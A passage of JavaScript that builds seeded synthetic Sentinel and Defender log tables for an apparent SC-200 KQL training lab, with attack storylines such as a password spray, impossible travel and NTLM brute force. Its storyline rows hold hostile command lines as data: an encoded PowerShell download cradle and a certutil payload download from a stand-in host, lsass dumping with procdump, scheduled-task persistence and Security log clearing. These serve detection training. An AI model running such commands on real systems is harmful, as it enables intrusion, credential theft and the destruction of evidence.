/* Cert Gauntlet — KQL Lab sample tables. Deterministic (seeded) so drills and the conformance suite are reproducible.
   "now" is pinned to LAB_NOW; ago(7d) etc. are relative to it. Tenant: Fabrikam (Microsoft's fictional company set).
   Schemas follow the Sentinel / Defender XDR columns people actually hit on SC-200 — including the gotchas:
   SigninLogs.ResultType is a STRING ("0", "50126"), Entities / AdditionalFields / Parameters are JSON TEXT (parse_json first).

   Storylines woven through the data (drills and the exam reference them):
   S1 password spray from 203.0.113.57 → one success for rlopez → New-InboxRule forwarding mail externally
   S2 impossible travel: mchen signs in from Cincinnati and Lagos 20 minutes apart
   S3 FAB-WKS-117: WINWORD.EXE → powershell -enc → certutil -urlcache download → rundll32 → beacon to 198.51.100.77 every 5 min
   S4 NTLM brute force from 192.0.2.44 against FAB-DC01 (4625 LogonType 3), then 4720 svc-backup2 created, 4732 added to Administrators, 1102 log cleared
   S5 phishing wave "Invoice overdue" from billing@northwind-pay.example to 30 recipients, mostly delivered
   S6 jpatel mass-downloads 60 files from SharePoint in 10 minutes after creating an anonymous link
   S7 svc-automation opens 3389 from Internet on an NSG; a Key Vault access policy is changed from an unusual IP
   S8 port scan from 192.0.2.44 through the Palo Alto firewall; Fortinet denies */
import { DT } from "./values.js";

export const LAB_NOW = Date.UTC(2026, 10, 15, 9, 0, 0); /* 2026-11-15T09:00:00Z */
const H = 3600000, M = 60000, D = 86400000;

function rng(seed) { let a = seed >>> 0; return () => { a |= 0; a = a + 0x6D2B79F5 | 0; let t = Math.imul(a ^ a >>> 15, 1 | a); t = t + Math.imul(t ^ t >>> 7, 61 | t) ^ t; return ((t ^ t >>> 14) >>> 0) / 4294967296; }; }
let R = rng(20261115);
const pick = a => a[Math.floor(R() * a.length)];
const int = (lo, hi) => lo + Math.floor(R() * (hi - lo + 1));
const chance = p => R() < p;
const dt = ms => new DT(Math.round(ms));
const tAgo = (loH, hiH) => LAB_NOW - (loH * H + R() * (hiH - loH) * H); /* uniform between loH and hiH hours ago */
const hex = n => Array.from({ length: n }, () => "0123456789abcdef"[int(0, 15)]).join("");
const guid = () => `${hex(8)}-${hex(4)}-4${hex(3)}-${pick("89ab")}${hex(3)}-${hex(12)}`;
const sha256 = () => hex(64), sha1 = () => hex(40), md5 = () => hex(32);

export const USERS = [
  ["rlopez", "Rosa Lopez", "Finance"], ["mchen", "Ming Chen", "Sales"], ["jpatel", "Jay Patel", "Engineering"], ["akowalski", "Anna Kowalski", "HR"], ["dnguyen", "Dan Nguyen", "IT"],
  ["sokafor", "Sade Okafor", "Finance"], ["tbrown", "Tom Brown", "Marketing"], ["lgarcia", "Lucia Garcia", "Legal"], ["kito", "Kenji Ito", "Engineering"], ["ehansen", "Erik Hansen", "Operations"],
  ["pmurphy", "Pat Murphy", "IT"], ["ysuzuki", "Yuki Suzuki", "Sales"], ["bsingh", "Bani Singh", "Engineering"], ["cmoreau", "Claire Moreau", "Finance"], ["oadeyemi", "Ola Adeyemi", "Operations"],
  ["gschmidt", "Greta Schmidt", "HR"], ["vrossi", "Vito Rossi", "Marketing"], ["nali", "Nadia Ali", "Legal"], ["wzhang", "Wei Zhang", "Engineering"], ["hkim", "Hana Kim", "Sales"],
  ["fdiaz", "Fer Diaz", "IT"], ["ipetrov", "Ivan Petrov", "Operations"], ["mdubois", "Marc Dubois", "Finance"], ["sjones", "Sam Jones", "Marketing"], ["rkumar", "Ravi Kumar", "Engineering"],
  ["svc-backup", "svc-backup", "IT"], ["svc-automation", "svc-automation", "IT"], ["adm-dnguyen", "Dan Nguyen (admin)", "IT"],
];
const upn = u => `${u}@fabrikam.com`;
const userId = {}; USERS.forEach(([u]) => userId[u] = guid());
const WKS = Array.from({ length: 40 }, (_, i) => `FAB-WKS-${String(101 + i).padStart(3, "0")}`);
const SRV = ["FAB-DC01", "FAB-DC02", "FAB-FS01", "FAB-APP01", "FAB-SQL01", "FAB-WEB01", "FAB-FWD-01"];
const HOSTS = WKS.concat(SRV);
const devId = {}; HOSTS.forEach(h => devId[h] = hex(40));
const userOfHost = {}; WKS.forEach((h, i) => userOfHost[h] = USERS[i % 25][0]);
const CORP_IP = () => `10.${int(10, 12)}.${int(0, 40)}.${int(2, 250)}`;
const PUB_IPS = ["20.42.73.11", "40.118.244.65", "52.96.165.242", "74.125.224.72", "104.18.32.47", "151.101.1.69", "172.217.14.206", "13.107.42.14"];
const US_CITIES = [["Cincinnati", "Ohio", "US"], ["Cincinnati", "Ohio", "US"], ["Columbus", "Ohio", "US"], ["Chicago", "Illinois", "US"], ["Austin", "Texas", "US"], ["Seattle", "Washington", "US"]];
const CITIES = US_CITIES; /* background sign-ins: US only, so multi-country users are the storyline ones (spray from DE, mchen from NG) */
const APPS = ["Office 365 Exchange Online", "Microsoft Teams", "Azure Portal", "Office 365 SharePoint Online", "Microsoft 365 Security and Compliance Center", "Windows Sign In", "OfficeHome", "Microsoft Graph Command Line Tools", "Azure Virtual Desktop Client"];
const BROWSERS = ["Edge 130.0.0", "Chrome 130.0.0", "Edge 129.0.0", "Safari 18.0"];
const OSS = ["Windows 11", "Windows 10", "MacOs", "iOS 18", "Android"];
const SPRAY_IP = "203.0.113.57", C2_IP = "198.51.100.77", C2_HOST = "update-cdn.badexample.net", SCAN_IP = "192.0.2.44", LAGOS_IP = "197.210.64.21", KV_IP = "45.33.32.156";
const T = {};
function table(name, cols, rows) { T[name] = { cols: cols.map(c => ({ name: c[0], type: c[1] })), rows }; }
const sortByTime = rows => rows.sort((a, b) => b[0].ms - a[0].ms); /* newest first, like the portal */

/* ======================= SigninLogs (≈330 rows) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["UserPrincipalName", "string"], ["UserDisplayName", "string"], ["UserId", "string"], ["AppDisplayName", "string"], ["IPAddress", "string"], ["Location", "string"], ["LocationDetails", "dynamic"], ["ResultType", "string"], ["ResultDescription", "string"], ["ConditionalAccessStatus", "string"], ["AuthenticationRequirement", "string"], ["RiskLevelDuringSignIn", "string"], ["RiskState", "string"], ["ClientAppUsed", "string"], ["DeviceDetail", "dynamic"], ["Status", "dynamic"], ["UserAgent", "string"], ["CorrelationId", "string"], ["Category", "string"]];
  const rows = [];
  const mk = (t, u, app, ip, city, res, extra = {}) => {
    const [name] = USERS.find(x => x[0] === u) ? [USERS.find(x => x[0] === u)[1]] : [u];
    const os = extra.os || pick(OSS), br = pick(BROWSERS);
    const desc = { "0": "", "50126": "Error validating credentials due to invalid username or password.", "50053": "Account is locked because user tried to sign in too many times with an incorrect user ID or password.", "50074": "Strong Authentication is required.", "53003": "Access has been blocked by Conditional Access policies.", "50140": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", "500121": "Authentication failed during strong authentication request." }[res];
    rows.push([dt(t), upn(u), name, userId[u] || guid(), app, ip, `${city[2]}`, { city: city[0], state: city[1], countryOrRegion: city[2] }, res, desc,
      res === "53003" ? "failure" : res === "0" && chance(.8) ? "success" : "notApplied", extra.auth || (chance(.6) ? "multiFactorAuthentication" : "singleFactorAuthentication"), extra.risk || "none", extra.risk && extra.risk !== "none" ? "atRisk" : "none",
      extra.client || (chance(.85) ? "Browser" : "Mobile Apps and Desktop clients"), { deviceId: extra.deviceId || (chance(.7) ? hex(32) : ""), operatingSystem: os, browser: br, isCompliant: extra.compliant ?? chance(.75), trustType: extra.trust || (chance(.7) ? "Azure AD joined" : "") }, { errorCode: +res, failureReason: res === "0" ? "Other." : desc, additionalDetails: res === "0" ? "MFA requirement satisfied by claim in the token" : "" },
      `Mozilla/5.0 (${os.startsWith("Win") ? "Windows NT 10.0; Win64; x64" : os === "MacOs" ? "Macintosh; Intel Mac OS X 14_6" : "Linux; Android 14"}) ${br}`, guid(), "SignInLogs"]);
  };
  /* background: ~230 normal sign-ins over 7 days, business hours, mostly US, mostly success */
  for (let i = 0; i < 230; i++) { const u = USERS[int(0, 24)][0]; const t = tAgo(0, 168); const res = chance(.9) ? "0" : pick(["50126", "50074", "50140", "53003"]); mk(t, u, pick(APPS), chance(.7) ? CORP_IP() : pick(PUB_IPS), pick(CITIES), res); }
  /* S1 password spray: 25 users, 1-2 attempts each, 50126, from SPRAY_IP, between 41h and 40.5h ago; then rlopez success at ~40.4h ago */
  const sprayStart = LAB_NOW - 41 * H;
  USERS.slice(0, 25).forEach(([u], i) => { for (let k = 0; k < (chance(.4) ? 2 : 1); k++) mk(sprayStart + i * 70000 + k * 15000, u, "Office 365 Exchange Online", SPRAY_IP, ["Frankfurt", "Hesse", "DE"], "50126", { os: "Windows 10", client: "Browser", compliant: false, trust: "" }); });
  mk(sprayStart + 29 * M, "rlopez", "Office 365 Exchange Online", SPRAY_IP, ["Frankfurt", "Hesse", "DE"], "0", { os: "Windows 10", compliant: false, trust: "", auth: "singleFactorAuthentication", risk: "medium" });
  mk(sprayStart + 31 * M, "rlopez", "OfficeHome", SPRAY_IP, ["Frankfurt", "Hesse", "DE"], "0", { os: "Windows 10", compliant: false, trust: "", auth: "singleFactorAuthentication", risk: "medium" });
  /* S2 impossible travel: mchen Cincinnati then Lagos 20 min later, ~26h ago */
  mk(LAB_NOW - 26 * H, "mchen", "Microsoft Teams", "10.11.4.77", CITIES[0], "0", { os: "Windows 11" });
  mk(LAB_NOW - 26 * H + 20 * M, "mchen", "Office 365 SharePoint Online", LAGOS_IP, ["Lagos", "Lagos", "NG"], "0", { os: "Windows 10", compliant: false, trust: "", risk: "high", auth: "singleFactorAuthentication" });
  /* lockout noise */
  for (let k = 0; k < 6; k++) mk(tAgo(2, 100), "tbrown", "Windows Sign In", CORP_IP(), CITIES[0], k < 5 ? "50126" : "50053");
  /* S7 unusual IP into Azure Portal for svc-automation */
  mk(LAB_NOW - 30 * H, "svc-automation", "Azure Portal", KV_IP, ["Fremont", "California", "US"], "0", { os: "Linux", compliant: false, trust: "", auth: "singleFactorAuthentication", risk: "low" });
  table("SigninLogs", cols, sortByTime(rows));
}

/* ======================= SecurityEvent (≈420 rows) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Computer", "string"], ["EventID", "int"], ["Activity", "string"], ["Account", "string"], ["AccountType", "string"], ["LogonType", "int"], ["LogonTypeName", "string"], ["IpAddress", "string"], ["WorkstationName", "string"], ["TargetAccount", "string"], ["TargetUserName", "string"], ["SubjectUserName", "string"], ["SubjectAccount", "string"], ["Process", "string"], ["NewProcessName", "string"], ["ParentProcessName", "string"], ["CommandLine", "string"], ["Status", "string"], ["SubStatus", "string"], ["Level", "string"], ["Channel", "string"], ["EventSourceName", "string"]];
  const ACT = { 4624: "4624 - An account was successfully logged on.", 4625: "4625 - An account failed to log on.", 4688: "4688 - A new process has been created.", 4672: "4672 - Special privileges assigned to new logon.", 4720: "4720 - A user account was created.", 4732: "4732 - A member was added to a security-enabled local group.", 4740: "4740 - A user account was locked out.", 1102: "1102 - The audit log was cleared.", 7045: "7045 - A service was installed in the system.", 4698: "4698 - A scheduled task was created.", 4634: "4634 - An account was logged off.", 4648: "4648 - A logon was attempted using explicit credentials." };
  const LT = { 2: "2 - Interactive", 3: "3 - Network", 4: "4 - Batch", 5: "5 - Service", 7: "7 - Unlock", 10: "10 - RemoteInteractive", 11: "11 - CachedInteractive" };
  const rows = [];
  const mk = (t, comp, id, o = {}) => rows.push([dt(t), `${comp}.fabrikam.com`, id, ACT[id], o.acct || "", o.acctType || "User", o.lt ?? null, o.lt ? LT[o.lt] : "", o.ip || "-", o.ws || "", o.target || "", o.targetUser || "", o.subj || "", o.subjAcct || "", o.proc || "", o.newProc || "", o.parent || "", o.cmd || "", o.status || "", o.sub || "", id === 4625 || id === 4740 || id === 1102 ? "8" : "8", "Security", "Microsoft-Windows-Security-Auditing"]);
  for (let i = 0; i < 230; i++) { const h = pick(HOSTS); const u = userOfHost[h] || pick(USERS)[0]; const t = tAgo(0, 168); const lt = pick([2, 2, 3, 3, 3, 7, 10, 5]); mk(t, h, 4624, { acct: `FABRIKAM\\${u}`, lt, ip: lt === 3 || lt === 10 ? CORP_IP() : "-", ws: lt === 3 ? pick(WKS) : "", target: `FABRIKAM\\${u}`, targetUser: u, subj: "-" }); if (chance(.3)) mk(t + 2000, h, 4634, { acct: `FABRIKAM\\${u}`, lt, target: `FABRIKAM\\${u}`, targetUser: u }); }
  for (let i = 0; i < 40; i++) { const h = pick(HOSTS); const u = pick(USERS)[0]; mk(tAgo(0, 168), h, 4625, { acct: `FABRIKAM\\${u}`, lt: 2, target: `FABRIKAM\\${u}`, targetUser: u, status: "0xc000006d", sub: "0xc000006a", ip: "-", ws: h }); }
  for (let i = 0; i < 40; i++) { const h = pick(HOSTS); const u = userOfHost[h] || "SYSTEM"; const p = pick([["C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\services.exe", "svchost.exe -k netsvcs -p"], ["C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "C:\\Windows\\explorer.exe", '"OUTLOOK.EXE"'], ["C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\explorer.exe", '"cmd.exe"'], ["C:\\Program Files\\Microsoft\\Teams\\current\\Teams.exe", "C:\\Windows\\explorer.exe", "Teams.exe --process-start-args"], ["C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\System32\\svchost.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Inventory.ps1"], ["C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\system32\\msiexec.exe /V"]]); mk(tAgo(0, 168), h, 4688, { acct: `FABRIKAM\\${u}`, subj: u, subjAcct: `FABRIKAM\\${u}`, newProc: p[0], parent: p[1], cmd: p[2] }); }
  for (let i = 0; i < 25; i++) { const u = pick(["adm-dnguyen", "svc-backup", "pmurphy"]); mk(tAgo(0, 168), pick(SRV), 4672, { acct: `FABRIKAM\\${u}`, subj: u, subjAcct: `FABRIKAM\\${u}` }); }
  /* S4 NTLM brute force against FAB-DC01 from SCAN_IP: 60 × 4625 LogonType 3 in 6 minutes, 52h ago, then 4740 lockouts, then 4624 for svc-backup, 4720, 4732, 1102 */
  const bf = LAB_NOW - 52 * H;
  for (let i = 0; i < 60; i++) { const u = USERS[i % 20][0]; mk(bf + i * 6000, "FAB-DC01", 4625, { acct: `FABRIKAM\\${u}`, lt: 3, ip: SCAN_IP, ws: "KALI", target: `FABRIKAM\\${u}`, targetUser: u, status: "0xc000006d", sub: i % 7 === 3 ? "0xc0000064" : "0xc000006a", proc: "NtLmSsp" }); }
  ["sokafor", "tbrown", "kito"].forEach((u, i) => mk(bf + 7 * M + i * 1000, "FAB-DC01", 4740, { acct: `FABRIKAM\\${u}`, target: `FABRIKAM\\${u}`, targetUser: u, ws: "KALI" }));
  mk(bf + 12 * M, "FAB-DC01", 4624, { acct: "FABRIKAM\\svc-backup", lt: 3, ip: SCAN_IP, ws: "KALI", target: "FABRIKAM\\svc-backup", targetUser: "svc-backup", proc: "NtLmSsp" });
  mk(bf + 13 * M, "FAB-DC01", 4672, { acct: "FABRIKAM\\svc-backup", subj: "svc-backup", subjAcct: "FABRIKAM\\svc-backup" });
  mk(bf + 15 * M, "FAB-DC01", 4720, { acct: "FABRIKAM\\svc-backup", subj: "svc-backup", subjAcct: "FABRIKAM\\svc-backup", target: "FABRIKAM\\svc-backup2", targetUser: "svc-backup2" });
  mk(bf + 16 * M, "FAB-DC01", 4732, { acct: "FABRIKAM\\svc-backup", subj: "svc-backup", subjAcct: "FABRIKAM\\svc-backup", target: "Builtin\\Administrators", targetUser: "Administrators" });
  mk(bf + 40 * M, "FAB-DC01", 1102, { acct: "FABRIKAM\\svc-backup2", subj: "svc-backup2", subjAcct: "FABRIKAM\\svc-backup2" });
  /* S3 on FAB-WKS-117 via 4688 as well (also in DeviceProcessEvents) */
  const s3 = LAB_NOW - 20 * H;
  mk(s3, "FAB-WKS-117", 4688, { acct: "FABRIKAM\\akowalski", subj: "akowalski", subjAcct: "FABRIKAM\\akowalski", newProc: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent: "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", cmd: "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdQBwAGQAYQB0AGUALQBjAGQAbgAuAGIAYQBkAGUAeABhAG0AcABsAGUALgBuAGUAdAAvAGEAJwApAA==" });
  mk(s3 + 25000, "FAB-WKS-117", 4688, { acct: "FABRIKAM\\akowalski", subj: "akowalski", subjAcct: "FABRIKAM\\akowalski", newProc: "C:\\Windows\\System32\\certutil.exe", parent: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", cmd: `certutil.exe -urlcache -split -f http://${C2_HOST}/u/svc.dat C:\\Users\\Public\\svc.dat` });
  mk(s3 + 60000, "FAB-WKS-117", 4688, { acct: "FABRIKAM\\akowalski", subj: "akowalski", subjAcct: "FABRIKAM\\akowalski", newProc: "C:\\Windows\\System32\\rundll32.exe", parent: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", cmd: "rundll32.exe C:\\Users\\Public\\svc.dat,Start" });
  mk(s3 + 90000, "FAB-WKS-117", 4698, { acct: "FABRIKAM\\akowalski", subj: "akowalski", subjAcct: "FABRIKAM\\akowalski", target: "\\Microsoft\\Windows\\UpdateOrchestrator\\SvcRefresh", cmd: "rundll32.exe C:\\Users\\Public\\svc.dat,Start" });
  mk(s3 + 95000, "FAB-WKS-117", 7045, { acct: "FABRIKAM\\akowalski", subj: "akowalski", target: "SvcRefresh", cmd: "C:\\Users\\Public\\svc.dat" });
  table("SecurityEvent", cols, sortByTime(rows));
}

/* ======================= DeviceProcessEvents (≈300) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Timestamp", "datetime"], ["DeviceId", "string"], ["DeviceName", "string"], ["ActionType", "string"], ["FileName", "string"], ["FolderPath", "string"], ["SHA256", "string"], ["SHA1", "string"], ["MD5", "string"], ["FileSize", "long"], ["ProcessVersionInfoCompanyName", "string"], ["ProcessCommandLine", "string"], ["ProcessId", "long"], ["ProcessCreationTime", "datetime"], ["AccountDomain", "string"], ["AccountName", "string"], ["AccountSid", "string"], ["AccountUpn", "string"], ["LogonId", "long"], ["InitiatingProcessAccountDomain", "string"], ["InitiatingProcessAccountName", "string"], ["InitiatingProcessAccountUpn", "string"], ["InitiatingProcessFileName", "string"], ["InitiatingProcessFolderPath", "string"], ["InitiatingProcessCommandLine", "string"], ["InitiatingProcessId", "long"], ["InitiatingProcessParentFileName", "string"], ["InitiatingProcessParentId", "long"], ["InitiatingProcessSHA256", "string"], ["InitiatingProcessIntegrityLevel", "string"], ["InitiatingProcessTokenElevation", "string"], ["ReportId", "long"], ["AdditionalFields", "string"]];
  const rows = []; let rid = 100000;
  const HASH = {}; const hOf = f => HASH[f] || (HASH[f] = [sha256(), sha1(), md5()]);
  const mk = (t, host, u, file, folder, cmd, parentFile, parentFolder, parentCmd, grand, o = {}) => { const h = hOf(file + (o.uniq || "")); const ph = hOf(parentFile); const dn = `${host.toLowerCase()}.fabrikam.com`; rows.push([dt(t), dt(t), devId[host], dn, "ProcessCreated", file, folder + "\\" + file, h[0], h[1], h[2], int(40000, 9000000), o.company || "Microsoft Corporation", cmd, int(1000, 60000), dt(t - int(5, 900)), "fabrikam", u, `S-1-5-21-1004336348-1177238915-682003330-${int(1100, 1300)}`, upn(u), int(100000, 9999999), "fabrikam", u, upn(u), parentFile, parentFolder + "\\" + parentFile, parentCmd, int(1000, 60000), grand, int(400, 9000), ph[0], o.il || "Medium", o.te || "TokenElevationTypeLimited", rid++, JSON.stringify({ InitiatingProcessPosixEffectiveUser: null, IsInitiatingProcessRemoteSession: false })]); };
  const SYS = "C:\\Windows\\System32", PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", OFF = "C:\\Program Files\\Microsoft Office\\root\\Office16";
  const NORMAL = [["svchost.exe", SYS, "svchost.exe -k netsvcs -p -s Schedule", "services.exe", SYS, "C:\\Windows\\system32\\services.exe", "wininit.exe"], ["OUTLOOK.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"', "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"], ["msedge.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", '"msedge.exe" --type=renderer', "msedge.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", '"msedge.exe"', "explorer.exe"], ["Teams.exe", "C:\\Program Files\\WindowsApps\\MSTeams_24295.605.3225.8804_x64__8wekyb3d8bbwe", '"ms-teams.exe"', "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"], ["cmd.exe", SYS, '"cmd.exe" /c dir', "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"], ["powershell.exe", PS, "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Inventory.ps1", "svchost.exe", SYS, "svchost.exe -k netsvcs -p -s Schedule", "services.exe"], ["MsMpEng.exe", "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24090.11-0", '"MsMpEng.exe"', "services.exe", SYS, "C:\\Windows\\system32\\services.exe", "wininit.exe"], ["WINWORD.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\Public\\Q4-plan.docx"', "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"], ["EXCEL.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"', "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"], ["conhost.exe", SYS, "\\??\\C:\\Windows\\system32\\conhost.exe 0x4", "cmd.exe", SYS, '"cmd.exe"', "explorer.exe"], ["net.exe", SYS, "net use Z: \\\\FAB-FS01\\share", "cmd.exe", SYS, '"cmd.exe"', "explorer.exe"], ["whoami.exe", SYS, "whoami /groups", "cmd.exe", SYS, '"cmd.exe"', "explorer.exe"], ["ipconfig.exe", SYS, "ipconfig /all", "cmd.exe", SYS, '"cmd.exe"', "explorer.exe"], ["mmc.exe", SYS, "mmc.exe C:\\Windows\\system32\\dsa.msc", "explorer.exe", "C:\\Windows", "C:\\Windows\\Explorer.EXE", "userinit.exe"]];
  for (let i = 0; i < 270; i++) { const host = pick(WKS); const u = userOfHost[host]; const n = pick(NORMAL); mk(tAgo(0, 168), host, u, n[0], n[1], n[2], n[3], n[4], n[5], n[6]); }
  /* S3 chain on FAB-WKS-117 (akowalski), 20h ago */
  const s3 = LAB_NOW - 20 * H; const W = "FAB-WKS-117", A = "akowalski";
  mk(s3 - 90000, W, A, "WINWORD.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\akowalski\\Downloads\\Invoice_88213.docm"', "OUTLOOK.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"', "explorer.exe");
  mk(s3, W, A, "powershell.exe", PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdQBwAGQAYQB0AGUALQBjAGQAbgAuAGIAYQBkAGUAeABhAG0AcABsAGUALgBuAGUAdAAvAGEAJwApAA==", "WINWORD.EXE", OFF, '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n "C:\\Users\\akowalski\\Downloads\\Invoice_88213.docm"', "OUTLOOK.EXE");
  mk(s3 + 25000, W, A, "certutil.exe", SYS, `certutil.exe -urlcache -split -f http://${C2_HOST}/u/svc.dat C:\\Users\\Public\\svc.dat`, "powershell.exe", PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...", "WINWORD.EXE");
  mk(s3 + 60000, W, A, "rundll32.exe", SYS, "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe", PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...", "WINWORD.EXE");
  mk(s3 + 70000, W, A, "schtasks.exe", SYS, 'schtasks.exe /create /tn "\\Microsoft\\Windows\\UpdateOrchestrator\\SvcRefresh" /tr "rundll32.exe C:\\Users\\Public\\svc.dat,Start" /sc minute /mo 5 /ru SYSTEM', "powershell.exe", PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...", "WINWORD.EXE");
  mk(s3 + 80000, W, A, "whoami.exe", SYS, "whoami /all", "rundll32.exe", SYS, "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe");
  mk(s3 + 85000, W, A, "nltest.exe", SYS, "nltest /dclist:fabrikam", "rundll32.exe", SYS, "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe");
  mk(s3 + 95000, W, A, "net.exe", SYS, "net group \"Domain Admins\" /domain", "rundll32.exe", SYS, "rundll32.exe C:\\Users\\Public\\svc.dat,Start", "powershell.exe");
  /* S4 on FAB-DC01: procdump of lsass by svc-backup2 */
  const bf = LAB_NOW - 52 * H + 30 * M;
  mk(bf, "FAB-DC01", "svc-backup2", "procdump64.exe", "C:\\Users\\Public", "procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\ls.dmp", "cmd.exe", SYS, '"cmd.exe"', "wsmprovhost.exe", { company: "Sysinternals - www.sysinternals.com", il: "High", te: "TokenElevationTypeFull" });
  mk(bf + 20000, "FAB-DC01", "svc-backup2", "wevtutil.exe", SYS, "wevtutil.exe cl Security", "cmd.exe", SYS, '"cmd.exe"', "wsmprovhost.exe", { il: "High", te: "TokenElevationTypeFull" });
  /* a couple of benign powershell -enc from the IT inventory job so "encoded = evil" is not a free win */
  for (let k = 0; k < 4; k++) mk(tAgo(3, 160), pick(["FAB-APP01", "FAB-FS01"]), "svc-automation", "powershell.exe", PS, "powershell.exe -NoProfile -EncodedCommand RwBlAHQALQBTAGUAcgB2AGkAYwBlACAAfAAgAEUAeABwAG8AcgB0AC0AQwBzAHYAIABDADoAXABJAG4AdgBcAHMAdgBjAC4AYwBzAHYA", "svchost.exe", SYS, "svchost.exe -k netsvcs -p -s Schedule", "services.exe");
  table("DeviceProcessEvents", cols, sortByTime(rows));
}

/* ======================= DeviceNetworkEvents (≈320) ======================= */
{
  const cols = [["TimeGenerated", "datetime"], ["Timestamp", "datetime"], ["DeviceId", "string"], ["DeviceName", "string"], ["ActionType", "string"], ["RemoteIP", "string"], ["RemotePort", "int"], ["RemoteUrl", "string"], ["LocalIP", "string"], ["LocalPort", "int"], ["Protocol", "string"], ["LocalIPType", "string"], ["RemoteIPType", "string"], ["InitiatingProcessSHA256", "string"], ["InitiatingProcessFileName", "string"], ["InitiatingProcessFolderPath", "string"], ["InitiatingProcessCommandLine", "string"], ["InitiatingProcessId", "long"], ["InitiatingProcessAccountDomain", "string"], ["InitiatingProcessAccountName", "string"], ["InitiatingProcessParentFileName", "string"], ["ReportId", "long"], ["AdditionalFields", "string"]];
  const rows = []; let rid = 200000;
  const mk = (t, host, u, act, rip, rport, url, proc, folder, cmd, parent, o = {}) => rows.push([dt(t), dt(t), devId[host], `${host.toLowerCase()}.fabrikam.com`, act, rip, rport, url, o.lip || `10.11.${int(0, 40)}.${int(2, 250)}`, int(49152, 65535), o.proto || "Tcp", "Private", rip.startsWith("10.") ? "Private" : "Public", sha256(), proc, folder, cmd, int(1000, 60000), "fabrikam", u, parent, rid++, "{}"]);
  const SAAS = [["52.96.165.242", 443, "outlook.office365.com", "OUTLOOK.EXE", "C:\\Program Files\\Microsoft Office\\root\\Office16", '"OUTLOOK.EXE"', "explorer.exe"], ["52.113.194.132", 443, "teams.microsoft.com", "ms-teams.exe", "C:\\Program Files\\WindowsApps\\MSTeams", '"ms-teams.exe"', "explorer.exe"], ["13.107.42.14", 443, "fabrikam.sharepoint.com", "msedge.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", '"msedge.exe"', "explorer.exe"], ["20.42.73.11", 443, "login.microsoftonline.com", "msedge.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", '"msedge.exe"', "explorer.exe"], ["104.18.32.47", 443, "cdn.jsdelivr.net", "msedge.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", '"msedge.exe"', "explorer.exe"], ["10.10.0.5", 445, "", "System", "C:\\Windows\\System32", "System", ""], ["10.10.0.4", 389, "", "lsass.exe", "C:\\Windows\\System32", "C:\\Windows\\system32\\lsass.exe", "wininit.exe"], ["10.10.0.4", 88, "", "lsass.exe", "C:\\Windows\\System32", "C:\\Windows\\system32\\lsass.exe", "wininit.exe"], ["20.189.173.1", 443, "v10.events.data.microsoft.com", "svchost.exe", "C:\\Windows\\System32", "svchost.exe -k utcsvc -p", "services.exe"], ["10.10.0.5", 53, "", "svchost.exe", "C:\\Windows\\System32", "svchost.exe -k NetworkService -p -s Dnscache", "services.exe"]];
  for (let i = 0; i < 260; i++) { const host = pick(WKS); const u = userOfHost[host]; const s = pick(SAAS); mk(tAgo(0, 168), host, s[3] === "System" || s[3] === "lsass.exe" || s[3] === "svchost.exe" ? "system" : u, chance(.93) ? "ConnectionSuccess" : "ConnectionFailed", s[0], s[1], s[2], s[3], s[4], s[5], s[6], { proto: s[1] === 53 ? "Udp" : "Tcp" }); }
